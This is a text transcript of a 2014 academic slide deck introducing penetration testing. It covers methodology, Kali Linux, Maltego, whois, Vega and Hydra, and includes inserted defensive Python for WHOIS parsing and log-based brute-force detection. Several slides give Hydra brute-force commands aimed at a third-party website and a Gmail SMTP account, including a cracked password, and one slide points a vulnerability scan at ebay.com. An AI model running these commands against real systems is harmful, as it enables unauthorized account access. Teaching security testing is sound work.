Penetration Testing - PowerPoint PPT Presentation

Title: Slide 1 Author: Lori Randel Last modified by: Elham Created Date: 4/19/2005 7:05:52 PM Document presentation format: On-screen Show (4:3) Company – PowerPoint PPT presentation

Slides: 28
Provided by: LoriR166
1
  • Penetration Testing

Presented by Elham Hojati. Advisor: Dr. Akbar Namin. July 2014
2
Part one: the concept of penetration testing
3
What is a penetration test? (informal)
  • Port scanning
  • Vulnerability Scanning
  • Penetration Testing

4
What is a penetration test?
  • A penetration test is an attack on a computer
    system, network or Web application to find
    vulnerabilities that an attacker could exploit
    with the intention of finding security
    weaknesses, potentially gaining access to it, its
    functionality and data.
  • Pen tests can be automated with software
    applications or they can be performed manually.
  • The process includes:
    • gathering information about the target before
      the test (reconnaissance),
    • identifying possible entry points (port scanning),
    • attempting to break in (either virtually or for
      real),
    • reporting back the findings.

5
Why conduct a penetration test?
  • Prevent data breach
  • Test your security controls
  • Ensure system security
  • Get a baseline
  • Compliance

6
Steps of penetration test (informal)
  • Establish goal
  • Information gathering
  • Reconnaissance
  • Discovery
  • Port scanning
  • Vulnerability scanning
  • Vulnerability analysis
  • Taking control
  • Exploitation
  • Brute forcing
  • Social engineering
  • Pivoting
  • Reporting
  • Evidence collection
  • Risk analysis
  • Remediation

7
Some Considerations
  • Scope
  • Internal or external
  • In-house or outsourced
  • Selecting a pen-tester (white hat hacker)
  • White hat hacker vs Black hat hacker

Penetration tests are sometimes called white hat
attacks because in a pen test, the good guys are
attempting to break in. The term "white hat" in
Internet slang refers to an ethical computer
hacker, or a computer security expert, who
specializes in penetration testing and in other
testing methodologies to ensure the security of
an organization's information systems.
8
Steps of penetration test
  • 12 subcategories of the Web Application
    Penetration Testing Methodology, based on the OWASP
    methodology:
  • Introduction and Objectives
  • Information Gathering
  • Configuration and Deploy Management Testing
  • Identity Management Testing
  • Authentication Testing
  • Authorization Testing
  • Session Management Testing
  • Data Validation Testing
  • Error Handling
  • Cryptography
  • Business Logic Testing
  • Client Side Testing

9
Steps of network penetration test

10
Steps of penetration test
  • Step 1: Introduction and Objectives
  • Step 2: Information gathering
  • Step 3: Vulnerability analysis
  • Step 4: Simulation (penetrate the system to
    provide the proof)
  • Step 5: Risk assessment
  • Step 6: Recommendations for reduction or recovery
    and providing the report

11
Part 2: Introduction to some Penetration Testing
Tools
https://drive.google.com/file/d/0B7j6y0yrm70VSmFGV0VtYWpucHM/edit?usp=sharing
pt.isfahanblog.com
12
Kali Linux
  • Kali Linux is a Debian-derived Linux
    distribution, designed for digital forensics and
    penetration testing.
  • Kali Linux is preinstalled with numerous
    penetration-testing programs.
  • Kali Linux can be run from a hard disk, live CD,
    or live USB. It is a supported platform of the
    Metasploit Project's Metasploit Framework, a tool
    for developing and executing security exploits.
  • From the creators of BackTrack comes Kali Linux,
    the most advanced penetration testing
    distribution created till now.

13
Installing Kali Linux
  • 1- Go to the link http://www.kali.org/downloads/
  • 2- Download the appropriate Kali Linux image for
    your system type (32 bit or 64 bit); for example,
    for a 64 bit OS download the Kali Linux 64 bit
    ISO. To find the system type, right click on the
    computer icon on your desktop or in the start
    menu, go to the properties tab and read the
    system type there.
  • 3- Then you can write this ISO file to a CD, DVD
    or flash memory and use it, or you can run it in
    VMware as described below.
  • 4- To run Kali Linux in VMware, go to the start
    menu, type VMware Workstation and open it.
  • 5- Go to File -> New Virtual Machine to install
    Kali Linux through this wizard.
  • 6- Install Kali Linux, select it from the list on
    the left side of the page and power it on.
  • 7- Type the user name and password (e.g. User:
    root, Pass: toor).
  • 8- Go to Applications -> Kali Linux to see all
    the penetration testing tools there.

14
Penetration testing tools
  • whois for information gathering step
  • Maltego for information gathering step
  • Hydra for brute force step
  • Vega for Vulnerability analysis

15
Maltego
  • Maltego is an open source intelligence and
    forensics application.
  • It will offer you gathering of information as
    well as the representation of this information in
    an easy to understand format.

16
Maltego
  • 1- Go to Applications -> Kali Linux -> top 10
    security tools -> maltego, or open a command line
    terminal and type maltego.
  • 2- If this is the first time you run the
    program, register with an email address, then
    log in to the program using this email address
    and the password that you set.
  • 3- Go to the menu tab (a circle at the top left
    corner of the page) and select new.
  • 4- From the palette menu (on the left side of
    the page), select domain and drag and drop it to
    the middle of the page.
  • 5- Type the domain name in the property view of
    the domain (on the right side).
  • 6- Right click on the domain. Choose Run
    Transform -> all transforms -> to website DNS.
  • 7- Right click on one of the websites and choose
    Run Transform -> all transforms ->
    ToServerTechnologiesWebsite.

17
Maltego
  • 8- Right click on one of the websites and choose
    Run Transform -> all transforms -> To IP Address.
  • 9- Right click on one of the IP addresses and
    choose Run Transform -> all transforms -> Net
    block using Whois.
  • 10- Right click on one of the net blocks and
    choose Run Transform -> all transforms ->
    toLocationCountryNetblock.
  • 11- Right click on one of the websites and choose
    Run Transform -> all transforms -> Mirror email
    addresses found.

18
WHOIS SERVICE
  • WHOIS is a query and response protocol that is
    widely used for querying databases that store the
    registered users of an Internet resource, such as
    a domain name, an IP address block, or an
    autonomous system.
  • It is also used for a wider range of other
    information.
  • The protocol stores and delivers database
    content in a human-readable format.

19
Using WHOIS SERVICE
  • 1- Open a command line terminal in Kali Linux and
    type whois <target>, for example whois google.com
  • 2- Type ping yahoo.com and find the IP address of
    yahoo.
  • 3- Type whois <yahoo IP address>
  • 4- Go to the link http://www.iana.org/whois and
    type google.com
  • 5- Go to the link http://www.whois.net/ and type
    www.google.com

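
The human-readable WHOIS output described above can be turned into structured fields and checked from the owner's side, for example to confirm that your own domain is locked and not close to expiry. This is an added example, not part of the original slides: the record is a constructed sample in the common gTLD "Key: value" layout, and the 60-day warning threshold is an assumed value.

```python
from datetime import datetime, timezone

# Constructed sample record; the domain and every value are placeholders,
# not the result of a real lookup.
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE-CORP.TEST
Registrar: Example Registrar, Inc.
Creation Date: 2010-03-01T12:00:00Z
Registry Expiry Date: 2025-03-01T12:00:00Z
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Name Server: NS1.EXAMPLE-CORP.TEST
Name Server: NS2.EXAMPLE-CORP.TEST
>>> Last update of whois database: 2025-01-10T00:00:00Z <<<
"""

def parse_whois(text):
    """Turn 'Key: value' lines into {key: [values]}; repeated keys accumulate."""
    record = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue  # comments, banners and footers carry no fields
        key, sep, value = line.partition(":")
        if sep and value.strip():
            record.setdefault(key.strip().lower(), []).append(value.strip())
    return record

def audit_domain(record, now, warn_days=60):
    """Return findings a domain owner would act on: missing lock, near expiry."""
    findings = []
    statuses = {s.split()[0].lower() for s in record.get("domain status", [])}
    if "clienttransferprohibited" not in statuses:
        findings.append("transfer lock not set")
    expiry = record.get("registry expiry date")
    if expiry:
        when = datetime.strptime(expiry[0], "%Y-%m-%dT%H:%M:%SZ")
        days_left = (when.replace(tzinfo=timezone.utc) - now).days
        if days_left < warn_days:
            findings.append(f"expires in {days_left} days")
    return findings
```
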
20
Vega
  • Vega is a free and open source scanner and
    testing platform to test the security of web
    applications.
  • Vega can help you find and validate SQL
    Injection, Cross-Site Scripting (XSS),
    inadvertently disclosed sensitive information,
    and other vulnerabilities.
  • It is written in Java, GUI based, and runs on
    Linux, OS X, and Windows.

21
Vega
  • 1- In Kali Linux go to Applications ->
    Kali Linux -> Web Applications -> web crawlers ->
    Vega, or open a command line terminal in Kali
    Linux and type vega.
  • 2- Go to the link
    https://subgraph.com/vega/download/index.en.html
    to download Vega.
  • 3- Install the Vega tool and run it.
  • 4- Go to the scan tab -> start new scan.
  • 5- Type http://www.ebay.com/ to find this website's
    vulnerabilities.

22
Hydra Brute force Attack

23
Finding a username and password of a website
  • Go to the website
    http://www.sunstudiophotography.com/
  • Type /hackme at the end of the website URL
    (to reach this part of the site you need a
    username and password).
  • Download a library of usernames and a library of
    passwords from the internet, or use tools such
    as key generator tools to produce a list of
    usernames and passwords (now you have 2 files: one
    of them consists of a list of usernames and the
    other one consists of a list of passwords).
  • Go to the command line terminal and type this:
  • hydra <website> -L <userlist> -P <wordlist> -V -f
    http-get /<sub dir>
  • for example:
  • hydra www.sunstudiophotography.com -L
    /root/Desktop/userlist.txt -P
    /root/Desktop/wordlist.txt -V -f http-get /hackme
  • You find the username and password of this web
    site.
  • Log in to the website using the username guest
    and password password 4

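
On the defending side, an http-get password-guessing run like the one above shows up in the web server's access log as a burst of 401 responses from one source against one path, sometimes ending in a 200. One way to detect that pattern is sketched below as an added example, not part of the original slides: the log lines are constructed (Combined Log Format, documentation addresses), and the threshold of 5 failures in 60 seconds is an assumed value.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample: eight failed Basic-auth requests in eight seconds, then
# a success from the same source, plus one unrelated failure.
SAMPLE_LOG = [
    f'203.0.113.7 - user{i} [10/Jul/2014:10:00:{i:02d} +0000] '
    f'"GET /hackme HTTP/1.1" 401 381' for i in range(8)
] + [
    '203.0.113.7 - guest [10/Jul/2014:10:00:09 +0000] "GET /hackme HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Jul/2014:10:00:10 +0000] "GET /hackme HTTP/1.1" 401 381',
]

def parse(line):
    """Return (ip, user, time, path, status), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], m["user"], ts, m["path"], int(m["status"])

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (ip, path) pairs with >= threshold 401s inside `window`. A 200 from
    a flagged pair is recorded too: that account's password was likely guessed."""
    failures = defaultdict(list)  # (ip, path) -> times of recent 401s
    alerts = {}
    for rec in filter(None, map(parse, lines)):
        ip, user, ts, path, status = rec
        key = (ip, path)
        if status == 401:
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "login": None})
                alert["failures"] = max(alert["failures"], len(failures[key]))
        elif status == 200 and key in alerts and alerts[key]["login"] is None:
            alerts[key]["login"] = user  # account to reset and investigate
    return alerts
```

An account reported under "login" should have its password reset, and rate limiting or lockout on the protected path removes the conditions the run depends on.
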
24
Hydra-gtk Finding Gmail password
  • 1- Go to Applications -> Kali Linux ->
    Password Attacks -> Online Attacks -> hydra-gtk
  • 2- Set:
  • In the target tab:
  • Single Target: smtp.gmail.com
  • Port: 465
  • Protocol: smtp
  • Use SSL should be selected
  • Show Attempts should be selected
  • In the passwords tab:
  • Username: el.sec.test.2014_at_gmail.com
  • Password list: browse and choose the password
    file
  • Try login as password should be selected.
  • Click start in the start tab.

25
  • 3- Hydra found the gmail password: 11111111q
  • 4- Or you can go to the command line terminal and
    type:
  • hydra -S -l el.sec.test.2014_at_gmail.com -P
    /root/Desktop/pass4.txt -V -s 465 smtp.gmail.com
    smtp
  • Or type:
  • hydra -s 465 -S -V -l el.sec.test.2014_at_gmail.com
    -P /root/Desktop/pass4.txt -e s -t 36 -w 36
    smtp.gmail.com smtp

27
Question